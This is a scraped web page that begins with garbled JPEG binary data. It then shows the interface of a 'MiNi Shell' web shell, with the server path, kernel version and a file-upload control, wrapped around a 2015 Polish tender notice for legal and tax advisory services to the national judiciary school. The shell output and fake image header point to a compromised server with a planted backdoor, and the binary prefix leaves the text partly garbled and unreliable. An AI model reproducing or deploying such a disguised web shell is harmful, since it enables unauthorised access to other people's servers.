JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151118/310832-N-2015.html

<p class="kh_header"><b>Kraków: Świadczenie pomocy prawnej oraz doradztwa podatkowego na rzecz Krajowej Szkoły Sądownictwa i Prokuratury</b><br>
<b>Numer ogłoszenia: 310832 - 2015; data zamieszczenia: 18.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krajowa Szkoła Sądownictwa i Prokuratury , ul. Przy Rondzie 5, 31-547 Kraków, woj. małopolskie, tel. 0048 12 6179655, faks 0048 12 6179653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kssip.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie pomocy prawnej oraz doradztwa podatkowego na rzecz Krajowej Szkoły Sądownictwa i Prokuratury.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia publicznego jest świadczenie pomocy prawnej oraz doradztwo podatkowe na rzecz Krajowej Szkoły Sądownictwa i Prokuratury (dalej jako: KSSiP), przy czym świadczenie pomocy prawnej obejmuje w szczególności:
1)zastępstwo prawne; 
2)zastępstwo procesowe, w szczególności przed sądami powszechnymi, Sądem Najwyższym oraz organami i sądami administracyjnymi wszystkich instancji, organami skarbowymi wszystkich instancji a także Krajową Izbą Odwoławczą przy Prezesie Urzędu Zamówień Publicznych. (Wykonawca pokryje we własnym zakresie koszty przejazdu na rozprawy, które odbywać się będą poza siedzibą Zamawiającego. Zamawiający nie jest w stanie określić przewidywanej ilości rozpraw w roku 2016. W roku 2015, do dnia 26.10.2015 r. było 19 rozpraw),
3)udzielanie porad prawnych;
4)udzielanie konsultacji prawnych;
5)sporządzanie opinii prawnych, w tym z zakresu prawa i postępowania cywilnego, prawa i postępowania administracyjnego, finansów publicznych, rachunkowości, gospodarki nieruchomościami, prawa podatkowego, prawa pracy i ubezpieczeń społecznych, prawa autorskiego i praw pokrewnych, prawa własności intelektualnej;
6)udzielanie porad prawnych, sporządzanie opinii prawnych w zakresie prawa zamówień publicznych w tym: 
a)doradztwo i opiniowanie w przygotowaniu postępowania przy: ustalaniu podstawowych założeń dotyczących przedmiotu zamówienia, ustalaniu warunków udziału w postępowaniu, jakie muszą spełniać wykonawcy ubiegający się o dane zamówienie, wyborze właściwego trybu udzielenia zamówienia publicznego, przygotowywaniu lub weryfikacji ogłoszenia o zamówienie publiczne, przygotowywaniu lub weryfikacji specyfikacji istotnych warunków zamówienia, w tym wzoru umowy,
b)doradztwo i opiniowanie w trakcie prowadzenia postępowania, obejmujące: analizę wniosków o dopuszczenie do udziału w postępowaniu oraz ofert wykonawców ubiegających się o udzielenie zamówienia, pomoc w udzielaniu odpowiedzi na wpływające do Zamawiającego pytania do specyfikacji istotnych warunków zamówienia, oraz przygotowanie zmian specyfikacji, prowadzenie negocjacji w trybach negocjacyjnych, inne bieżące doradztwo w toku postępowania, udział w pracach komisji przetargowej na wniosek Zamawiającego,
c)przygotowywanie odpowiedzi na odwołania do Krajowej Izby Odwoławczej oraz skargi do Sądu Okręgowego;
7)obsługa prawna inwestycji; 
8)sporządzanie projektów decyzji administracyjnych, umów, aneksów, porozumień, ugód, itp.;
9)opiniowanie projektów decyzji administracyjnych, umów, aneksów, porozumień, ugód, itp.;
10)opracowywanie lub opiniowanie projektów wewnątrzzakładowych aktów prawnych;
11)udział w negocjacjach, rokowaniach, spotkaniach oraz telekonferencjach prowadzonych przez Zamawiającego;
12)obsługa prawna w zakresie działalności Krajowej Szkoły Sądownictwa 
i Prokuratury związanej z wykorzystaniem funduszy pomocowych; 
13)stałe dyżury jednego prawnika w siedzibie Zamawiającego w wymiarze co najmniej 10 godzin tygodniowo (codziennie dwie godziny, w godz. 12.00-14.00) oraz, na tych samych zasadach, stałe dyżury prawnika specjalizującego się w problematyce zamówień publicznych w wymiarze co najmniej 6 godzin tygodniowo (po dwie godziny w poniedziałki, środy, piątki, w godz. 10.00-12.00) - łącznie 16 godzin tygodniowo; 
14)wykonywanie innych czynności z zakresu pomocy prawnej, w zależności od zapotrzebowania Zamawiającego, wynikających z przepisów ustawy z dnia 
23 stycznia 2009 r. o Krajowej Szkole Sądownictwa i Prokuratury (t.j. Dz. U. z 2012 r., poz. 1230 ze zm.) lub też innych obowiązujących przepisów prawa.
2.Zamawiający zastrzega, że obsługa prawna nie może ograniczać się do czasu obecności na dyżurach. W sprawach pilnych, wymagających obecności Wykonawcy u Zamawiającego, Wykonawca zobowiązany jest stawić się w siedzibie KSSiP w Krakowie w dniu zgłoszenia przez Zamawiającego takiej konieczności. Sprawy pilne to takie, które będą wymagały natychmiastowego wykonania lub wyjaśnienia.
3.Wykonawca zobowiązany jest do udzielenia odpowiedzi na zadane pytania 
w terminie 2 dni roboczych od daty ich otrzymania oraz do sporządzania opinii prawnych i projektów pism w terminie 3 dni roboczych, a w przypadku zagadnień wymagających szczegółowej analizy prawnej - 4 dni roboczych od dnia otrzymania wniosku o ich sporządzenie. W zakresie prawa zamówień publicznych Wykonawca zobowiązany jest do udzielania odpowiedzi na zadane pytania oraz sporządzania opinii prawnych i projektów pism w terminie 2 dni roboczych od daty ich otrzymania (na dyżurach w siedzibie Zamawiającego lub za pośrednictwem poczty elektronicznej).
Projekt opinii powinien zawierać dokładny opis stanu faktycznego, dokonanie oceny prawnej, sformułowanie potencjalnych rozwiązań oraz ich uzasadnienie. Zamawiający powinien w opinii znaleźć jednoznaczną odpowiedź na swoje pytania. Wymagane jest, aby w części dotyczącej uzasadnienia potencjalnych rozwiązań zanalizować wszystkie elementy dotyczące przedstawionej sprawy, używając fachowego i precyzyjnego języka a także, aby w projekcie opinii - w razie potrzeby - przytoczyć literaturę, orzecznictwo, rozważania teoretyczno-prawne lub prawno-porównawcze.
4.Zamawiający zastrzega, że wszelkie czynności wykonywane w ramach świadczenia pomocy prawnej muszą być wykonywane przez prawnika spełniającego warunki udziału w postępowaniu i wskazanego w ofercie przez Wykonawcę. Zamawiający dopuszcza zastępstwo na zasadach wskazanych 
w umowie, stanowiącej załącznik nr 2 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy Pzp, o wartości nie przekraczającej 20 % wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań szczegółowych - Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia. Wzór oświadczenia stanowi zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał bądź wykonuje:
a)co najmniej jedną usługę, realizowaną nieprzerwanie przez okres nie krótszy niż 12  miesięcy, obejmującą swoim zakresem kompleksową obsługę prawną na rzecz jednostek sektora finansów publicznych w rozumieniu ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych, o wartości nie mniejszej niż 100 000,00 zł brutto (słownie: sto tysięcy złotych brutto), tym samym niedopuszczalne jest łącznie kilku usług świadczonych w ramach oddzielnych umów, choćby dla tego samego podmiotu, mających na celu uzyskanie w sumie wartości co najmniej 100 000,00 zł. Zamawiający nie dopuszcza możliwości sumowania wartości usług świadczonych w ramach zamówień częściowych czy uzupełniających; oraz 
b)co najmniej dwie usługi realizowane nieprzerwanie przez okres nie krótszy niż 12 miesięcy każda, obejmujące swoim zakresem kompleksowe doradztwo prawne przy udzielaniu zamówień publicznych, podlegających przepisom ustawy - Prawo zamówień publicznych, na rzecz podmiotów, o których mowa w art. 3 ust. 1 ustawy Pzp,
oraz załączy dowody potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań szczegółowych - Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia. Wzór oświadczenia stanowi zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca wykaże, iż dysponuje lub będzie dysponował zespołem osób zdolnych do wykonania zamówienia, tj.:
1.	2 (dwiema) osobami, które spełniają następujące warunki:
a)posiadają uprawnienia do świadczenia pomocy prawnej w rozumieniu ustawy 
z dnia 6 lipca 1982 r. o radcach prawnych (Dz. U. z 2015 r., poz. 507) albo ustawy z dnia 26 maja 1982 r. - Prawo o adwokaturze (Dz. U. z 2015 r., poz. 615), w postaci tytułu zawodowego radcy prawnego albo adwokata, lub jako prawnik zagraniczny w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczpospolitej Polskiej (Dz. U. z 2014 r., poz. 134),
b)posiadają co najmniej 3 -letnie  doświadczenie w świadczeniu pomocy prawnej jako radca prawny, adwokat lub prawnik zagraniczny w jednostkach sektora finansów publicznych w rozumieniu ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. z 2013 r., poz. 885 ze zm.), oraz każda z tych osób posiada doświadczenie polegające na realizacji co najmniej 3 usług obsługi prawnej realizowanej nieprzerwanie przez okres nie krótszy niż 12  miesięcy każda, obejmujących swoim zakresem kompleksową obsługę prawną z zakresu prawa i postępowania cywilnego, prawa i postępowania administracyjnego, finansów publicznych, rachunkowości, gospodarki nieruchomościami, prawa podatkowego, prawa pracy i ubezpieczeń społecznych,  prawa własności intelektualnej (Zamawiający wymaga, aby warunek obsługi w zakresie wyszczególnionych dziedzin prawa był spełniony łącznie w każdej wskazanej przez wykonawcę usłudze). Jedna z tych osób będzie pełniła dyżur w siedzibie Zamawiającego w terminach wskazanych w niniejszej specyfikacji;
2.	1 (jedną) osobą, która spełnia następujące warunki:
a)posiada tytuł zawodowy radcy prawnego lub adwokata w rozumieniu przepisów ustawy z dnia 6 lipca 1982 r. o radcach prawnych lub ustawy z dnia 26 maja 1982  - Prawo o adwokaturze albo prawnika zagranicznego 
w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej, oraz 
b)posiada doświadczenie w reprezentowaniu, w okresie ostatnich 3 lat przed terminem składania ofert, strony lub uczestnika postępowania łącznie w pięciu postępowaniach przed: Krajową Izbą Odwoławczą lub Sądem Okręgowym w związku ze skargą na orzeczenie Krajowej Izby Odwoławczej w zakresie postępowania o udzielenie zamówienia publicznego. Wraz z wykazem osób Wykonawca  zobowiązany jest podać nazwę postepowania i sygnaturę sprawy prowadzonej przez wskazaną osobę, oraz
c)w okresie trzech lat przed terminem składania ofert, sporządziła jako autor, co najmniej dziesięć pisemnych opinii prawnych* z zakresu udzielania zamówień publicznych w oparciu o ustawę Prawo zamówień publicznych. Wraz 
z wykazem osób Wykonawca  zobowiązany jest podać nazwę instytucji, na rzecz której wydana była opinia, termin jej wydania i krótki opis, czego dotyczyła, sporządzoną przez wskazaną osobę.
*Zamawiający uważa za prawidłowo sporządzoną opinię prawną taką, która zawiera dokładny opis stanu faktycznego, dokonaną ocenę prawną, sformułowanie potencjalnych rozwiązań oraz jednoznaczną odpowiedź na zadane pytania, sporządzoną fachowym 
i precyzyjnym językiem, a w razie potrzeby przytaczającą literaturę, orzecznictwo, rozważania teoretyczno - prawne lub prawno - porównawcze.
Za autora opinii prawnej uznaje się osobę, która złożyła podpis na wersji pisemnej opinii, przekazanej następnie podmiotowi, który zamówił jej sporządzenie, oraz
d)w okresie trzech lat przed terminem składania ofert, uczestniczyła bezpośrednio poprzez opiniowanie lub przeprowadziła co najmniej 20 zakończonych postępowań prowadzonych zgodnie z przepisami ustawy Prawo zamówień publicznych. Przez zakończone postępowanie należy rozumieć postępowania zakończone podpisaniem umowy z wykonawcą. Wraz z wykazem osób Wykonawca  zobowiązany jest podać nazwy wykonanych przez wskazaną osobę postępowań oraz nazwy zamawiających, których dotyczyły te postępowania.

Wskazana osoba będzie pełniła dyżur w siedzibie Zamawiającego w terminach wskazanych w niniejszej specyfikacji.

3.	1 (jedną) osobą, która spełnia następujące warunki:
- posiada tytuł zawodowy doradcy podatkowego, wpisanego na listę doradców podatkowych na podstawie przepisów ustawy z dnia 5 lipca 1996 r. o doradztwie podatkowym, oraz posiada co najmniej 3 - letnie doświadczenie zawodowe w jednostkach sektora finansów publicznych w rozumieniu ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych;
Uwaga: Nie dopuszcza się łączenia funkcji przez jedną osobę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań szczegółowych - Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia. Wzór oświadczenia stanowi zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie osób zdolnych do wykonania zamówienia - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy zawarty jest w załączniku nr 2 do SIWZ.
2. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokona wyboru Wykonawcy w przypadku:
1) wystąpienia siły wyższej;
2) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy;
3) zmiany godzin pełnienia dyżurów prawników;
4) zmiany prawnika świadczącego usługi prawnicze pod warunkiem, że nowy prawnik będzie spełniał warunki udziału w postępowaniu w stopniu co najmniej tym samym, co osoba dotychczas świadcząca usługi i wskazana w ofercie Wykonawcy.
Wykonawca w takiej sytuacji musi udowodnić Zamawiającemu, że nowa osoba spełnia warunki udziału w postępowaniu w stopniu co najmniej tym samym, co osoba dotychczas świadcząca usługi,  a Zamawiający musi wyrazić na to zgodę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kssip.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krajowa Szkoła Sądownictwa i Prokuratury, ul. Przy Rondzie 5, 31-547 Kraków, pokój 328; Fax 12 617 96 53, e-mail: zamowienia@kssip.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 12:00, miejsce: Oferty należy składać pod adres Krajowa Szkoła Sądownictwa i Prokuratury, ul. Przy Rondzie 5, 31-547 Kraków, Kancelaria Ogólna pokój nr 419 do dnia 26.11.2015 r. do godz. 12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com